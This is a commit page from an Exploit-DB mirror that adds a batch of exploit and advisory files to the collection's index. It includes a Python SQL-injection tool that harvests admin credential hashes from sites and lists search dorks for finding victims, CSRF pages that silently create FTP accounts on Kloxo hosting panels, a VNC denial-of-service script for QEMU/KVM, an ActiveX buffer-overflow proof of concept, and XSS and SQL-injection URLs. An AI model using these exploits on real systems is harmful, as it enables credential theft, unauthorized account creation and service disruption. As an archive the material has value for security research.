bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-04 04:34:07 +00:00
parent ef978c474e
commit d39d09c4d0
15 changed files with 707 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -29422,3 +29422,17 @@ id,file,description,date,author,platform,type,port
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
32663,platforms/php/webapps/32663.txt,"Injader 2.1.1 SQL Injection and HTML Injection Vulnerabilities",2008-12-15,anonymous,php,webapps,0
32664,platforms/hardware/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,hardware,webapps,8080
32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80
32669,platforms/php/webapps/32669.txt,"phpcksec 0.2 'phpcksec.php' Cross Site Scripting Vulnerability",2008-12-17,ahmadbady,php,webapps,0
32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0
32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 'p' Parameter Multiple SQL Injection Vulnerabilities",2008-12-18,"crash over",php,webapps,0
32672,platforms/php/webapps/32672.txt,"EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability",2008-12-18,Ehsan_Hp200,php,webapps,0
32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0

Can't render this file because it is too large.

228
platforms/hardware/webapps/32664.txt Executable file
View file

@ -0,0 +1,228 @@
Document Title:
===============
iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1240
Release Date:
=============
2014-03-31
Vulnerability Laboratory ID (VL-ID):
====================================
1240
Common Vulnerability Scoring System:
====================================
7.8
Product & Service Introduction:
===============================
I forgot to bring the cable, can I download the original photos from iPhone to my computer now ? With this software, just select the photos
you want to download, enable build in http server, you are on your way to get the full size photos! Use it as your usb stick or mobile hard disk.
Copy files, share image with your friends. Copy your video, audio, text, pdf or office files on to it. Enjoy it on the road, share it with your friends.
Build in http server enables to exchange information with any computer has browser. Need local WiFi network or cellular network for using this application.
Suggest to download over WiFi network. Or enable computer-to-computer WiFi network on your computer, let iPhone or iPod to join your computer\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s own WiFi network.
(Copy of the Product Homepage: https://itunes.apple.com/us/app/ishare-your-moving-library/id309685106 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered multiple web vulnerabilities in the official iShare - Your moving libarary iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shanghai KaiWei Network Technology
Product: iShare Your moving library - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious
`filename` value in the `Upload` POST method request to compromise the mobile web-application. The attack vector is on the application-side
of the wifi service and the request method to inject is POST. The local file/path include execution occcurs in the index file dir list of
the upload path. Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to
execute different local malicious requests. The security risk of the local file include web vulnerability is estimated as high(+) with a
cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Search/Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official iShare - Your moving libarary iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the POST method request of the `Upload` module. Remote attackers are able to upload a php or js web-shells by
renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
name and extension `test.jpg.html.php.asp.html.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg
file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is estimated
as high with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the arbitrary file upload web vulnerability results in unauthorized file access and system compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<a href="/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png" class="file"><%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</a></td><td class='del'>
<form action='/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10586417925275
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/files/./test.jpg.html.php.asp.html[ARBITRARY FILE UPLOAD VULNERABILITY!]
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------23444256163832
Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/jpeg
Reference(s):
http://localhost:8080/files/
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability via filename value is estimated as high(+).
1.2
The security risk of the remote arbitrary file upload web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

2
platforms/hardware/webapps/32667.pdf Executable file
View file

@ -0,0 +1,2 @@
pdf

57
platforms/linux/dos/32675.py Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/32910/info
QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.
Attackers can exploit this issue to create a denial-of-service condition.
The following are vulnerable:
QEMU 0.9.1 and prior
KVM-79 and prior
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Security types
sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])
# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."
# Share desktop flag: no
s.send("\x00")
# Server framebuffer parameters:
framebuf=s.recv(100)
# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)
s.close()

41
platforms/multiple/remote/32673.java Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
import gnu.java.security.util.PRNG;
class PRNGTest {
public static void main(String args[])
{
long t = System.currentTimeMillis();
System.out.println("Time in ms is " + t);
PRNG prng = PRNG.getInstance();
byte buffer[] = new byte[40];
prng.nextBytes(buffer, 0, buffer.length);
for(int i = 0; i != buffer.length; ++i)
{
// There must be an easier way to do this (right?)
int intval = buffer[i];
if(intval <= 0)
intval += 256;
String s = Integer.toHexString(intval);
if(s.length() == 1)
s = "0" + s;
System.out.print(s);
}
System.out.println("");
}
};

56
platforms/multiple/remote/32674.cpp Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
#include <botan/init.h>
#include <botan/sha160.h>
#include <botan/loadstor.h>
using namespace Botan;
#include <cstdlib>
#include <ctime>
int main(int argc, char* argv[])
{
Botan::LibraryInitializer init;
// by default start with a guess of 1 minute ago
u64bit time_guess = (std::time(0) - 60);
time_guess *= 1000; // convert to ms
u32bit how_many = 60000; // 60 second range by default
if(argc >= 2)
how_many = std::atoi(argv[1]);
if(argc >= 3)
time_guess = std::atoi(argv[2]);
//printf("Starting from %lld up to %d\n", time_guess, how_many);
SHA_160 sha;
byte buf[8], hash[40];
for(u32bit i = 0; i != how_many; ++i)
{
Botan::store_be(time_guess, buf);
// First block
sha.update(buf, sizeof(buf));
sha.final(hash);
sha.update(buf, sizeof(buf));
sha.update(hash, 20); // previous output
sha.final(hash + 20);
/*
printf("seed=%lld hash=", time_guess);
for(u32bit j = 0; j != sizeof(hash); ++j)
printf("%02X", hash[j]);
printf("\n");
*/
++time_guess; // move to next ms
}
}

114
platforms/php/webapps/32662.py Executable file
View file

@ -0,0 +1,114 @@
source: http://www.securityfocus.com/bid/32829/info
WebPhotoPro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, re, time, urllib2
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) !=2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Help: webphotopro.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h' or arg == '--help' or arg == '-help':
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Usage: webphotopro.py www.site.com |"
print "| Example: python webphotopro.py www.ere.gov.al |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
vulnsql = ["art.php?idm=1'+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13+from+editor/*", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor--","rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9+from+editor--", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9,10+from+editor--","galeri_info.php?ida=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6+from+editor/*", "galeri_info.php?ida=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor/*","rubrika.php?idr=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor--","rub.php?idr=176+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor/*"]
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site + "/"
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan...\n"
for sql in vulnsql:
print "[+] Checking:" ,site+sql.replace("\n","")
print
try:
code = urllib2.urlopen(site+sql.replace("\n", "")).read()
hash = re.findall("[a-f0-9]"*32,code)
if len(hash) >=1:
print "[w00t!w00t!]" ,site+sql.replace("\n","")
print
print "Admin panel: ",site+"admini/"
print "Check for default login --> admin:demo"
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt):
pass
print
print
print
print "[!!!] For more target try next dorks: "
print
print '''\t inurl:/art.php?idm=
intext:"Powered by WebPhotoPro"
inurl:/rub.php?idr=
inurl:/galeri_info.php?lang=
inurl:/galeri_info.php?l=
inurl:/galeri_info.php?ida=
inurl:/tekst.php?idt=
inurl:/rubrika.php?idr=
intext:"Powered by WebPhotoPro" site:al'''
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/webphotopro-sql.txt"
print
print "\n[-] %s" % time.strftime("%X")

11
platforms/php/webapps/32663.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/32843/info
Injader is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Injader 2.1.2 are vulnerable.
http://www.example.com/upload/feeds.php?name=articles&id=<SQL>

52
platforms/php/webapps/32665.txt Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title :Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage :http://lxcenter.org/software/kloxo
# Version :6.1.18
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Blog :http://www.ncoskun.com http://www.grisapka.org
# Discovery date :03/12/2014
# CVE :N/A
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
Poc Exploit
================
<html>
<head><title>Kloxo demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo 6.1.18 Stable CSRF Vulnerability //
//Author:Necmettin COSKUN => twitter.com/@babayarisi //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New Ftp Username
var username="demouser";
//New Ftp Password
var pass="12345678";
//This creates new folder under admin dir. /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src=""></img>
</body>
</html>
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!

54
platforms/php/webapps/32666.txt Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version :Kloxo-MR 6.5.0.f-2014020301
# Tested on :Centos 6.4
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Blog :http://www.ncoskun.com http://www.grisapka.org
# Discovery date :03/12/2014
# CVE :N/A
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
Poc Exploit
================
<html>
<head><title>Kloxo-MR demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo-MR 6.5.0 CSRF Vulnerability //
//Author:Necmettin COSKUN => twitter.com/@babayarisi //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New Ftp Username
var username="demouser";
//New Ftp Password
var pass="12345678";
//This creates new folder under admin dir. /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src=""></img>
</body>
</html>
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!

10
platforms/php/webapps/32669.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/32890/info
The 'phpcksec' script is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
This issue affects phpcksec 0.2.0; other versions may also be affected.
http://www.example.com/path/phpcksec.php?path=>\'><ScRiPt >alert(0);</ScRiPt>

45
platforms/php/webapps/32670.txt Executable file
View file

@ -0,0 +1,45 @@
Unvalidated Redirects on Oracle Identity Manager
=======================================================================
[ADVISORY INFORMATION]
Title: Unvalidated Redirects on Oracle Identity Manager
Discovery date: 10/12/2013
Release date: 03/04/2014
Vendor Homepage: www.oracle.com
Version: Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0)
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
[VULNERABILITY INFORMATION]
Class: Unvalidated Redirects
Category: Web
AFFECTED PRODUCTS]
This security vulnerability affects:
* Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0)
[VULNERABILITY DETAILS]
Sending to a legitimate user the following request:
https://trusteddomainname/identity/faces/firstlogin?action=changepwd&backUrl=https://myevildomain/
it is possible, after the password change procedure, to redirect the user to a malicious domain.
Attacker links to unvalidated redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. So such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information.
[DISCLOSURE TIME-LINE]
* 10/12/2013 - Initial vendor contact.
* 11/12/2013 - Oracle confirmed the issue is a new security vulnerability.
* 03/04/2014 - Oracle hasn't fixed this vulnerability yet.
* 03/04/2014 - Public disclosure.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

9
platforms/php/webapps/32671.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32906/info
DO-CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DO-CMS 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?p=%28SQL%29

7
platforms/php/webapps/32672.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32908/info
EasySiteNetwork Jokes Complete Website is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--

7
platforms/windows/remote/32661.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32814/info
Evans FTP ActiveX control is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
<HTML> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /> <HEAD> <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE> </HEAD> <BODY> [+] Application : EvansFTP ActiveX <br> [+] CompanyName : Evans Programming <br> [+] Description : Multi-threaded asynchronus Active-X FTP Control<br> [+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br> [+] Exploit : Remote BoF (PoC)<br> [+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br> [+] Object Safety Report :<br> Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br><br> RegKey Safe for Script: Faux<br> RegkeySafe for Init: Faux<br> KillBitSet: Faux<br> <br><br> The Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br> 1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br> 2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br> 3- ProxyName suffers from a BoF when we pass a string over 1044 <br> 4- Password suffers from a BoF when we pass a string over 1044 <br> 5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br> 6- LoginName suffers from a BoF when we pass a string over 1044 <br> 7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br> DisASM RemoteAddress Crash :<br><pre> 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00 </pre> <script language='vbscript'> Sub RemoteAddress arg1=String(2068, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyPrefix arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub Password arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyBypassList arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub LoginName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub CurrentDirectory arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub </script><br><br> <INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()> <INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()> <INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()> <INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()> <INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()> <INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()> <INPUT TYPE="button" 